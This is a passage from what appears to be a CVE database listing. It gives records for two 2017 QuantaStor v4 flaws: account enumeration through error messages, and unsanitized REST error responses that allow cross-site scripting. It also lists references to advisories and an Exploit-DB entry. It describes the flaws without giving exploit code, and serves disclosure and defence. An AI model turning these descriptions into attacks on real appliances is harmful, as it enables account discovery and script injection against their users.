"value": "On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, a flaw was found with the error message sent as a response for users that don\u0027t exist on the system. An attacker could leverage this information to fine-tune and enumerate valid accounts on the system by searching for common usernames."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.vvvsecurity.com/advisories/vvvsecurity-advisory-2017-6943.txt",
"refsource": "MISC",
"url": "http://www.vvvsecurity.com/advisories/vvvsecurity-advisory-2017-6943.txt"
},
{
"name": "42517",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/42517/"
},
{
"name": "20170815 QuantaStor Software Define Storage mmultiple vulnerabilities",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2017/Aug/23"
},
{
"name": "http://packetstormsecurity.com/files/143780/OSNEXUS-QuantaStor-4-Information-Disclosure.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/143780/OSNEXUS-QuantaStor-4-Information-Disclosure.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-9978",
"datePublished": "2017-08-28T19:00:00.000Z",
"dateReserved": "2017-06-26T00:00:00.000Z",
"dateUpdated": "2024-08-05T17:25:00.517Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-9979 (GCVE-0-2017-9979)
Vulnerability from cvelistv5 – Published: 2017-08-28 19:00 – Updated: 2024-08-05 17:24
VLAI?
Summary
On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, if the REST call invoked does not exist, an error will be triggered containing the invalid method previously invoked. The response sent to the user isn't sanitized in this case. An attacker can leverage this issue by including arbitrary HTML or JavaScript code as a parameter, aka XSS.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Date Public ?
2017-08-12 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T17:24:59.981Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.vvvsecurity.com/advisories/vvvsecurity-advisory-2017-6943.txt"
},
{
"name": "42517",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/42517/"
},
{
"name": "20170815 QuantaStor Software Define Storage mmultiple vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2017/Aug/23"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/143780/OSNEXUS-QuantaStor-4-Information-Disclosure.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-08-12T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, if the REST call invoked does not exist, an error will be triggered containing the invalid method previously invoked. The response sent to the user isn\u0027t sanitized in this case. An attacker can leverage this issue by including arbitrary HTML or JavaScript code as a parameter, aka XSS."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.vvvsecurity.com/advisories/vvvsecurity-advisory-2017-6943.txt"
},
{
"name": "42517",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/42517/"
},
{
"name": "20170815 QuantaStor Software Define Storage mmultiple vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2017/Aug/23"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/143780/OSNEXUS-QuantaStor-4-Information-Disclosure.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-9979",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, if the REST call invoked does not exist, an error will be triggered containing the invalid method previously invoked. The response sent to the user isn\u0027t sanitized in this case. An attacker can leverage this issue by including arbitrary HTML or JavaScript code as a parameter, aka XSS."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.vvvsecurity.com/advisories/vvvsecurity-advisory-2017-6943.txt",
"refsource": "MISC",
"url": "http://www.vvvsecurity.com/advisories/vvvsecurity-advisory-2017-6943.txt"
},
{
"name": "42517",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/42517/"
},
{
"name": "20170815 QuantaStor Software Define Storage mmultiple vulnerabilities",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2017/Aug/23"
},
{
"name": "http://packetstormsecurity.com/files/143780/OSNEXUS-QuantaStor-4-Information-Disclosure.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/143780/OSNEXUS-QuantaStor-4-Information-Disclosure.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-9979",
"datePublished": "2017-08-28T19:00:00.000Z",
"dateReserved": "2017-06-26T00:00:00.000Z",
"dateUpdated": "2024-08-05T17:24:59.981Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}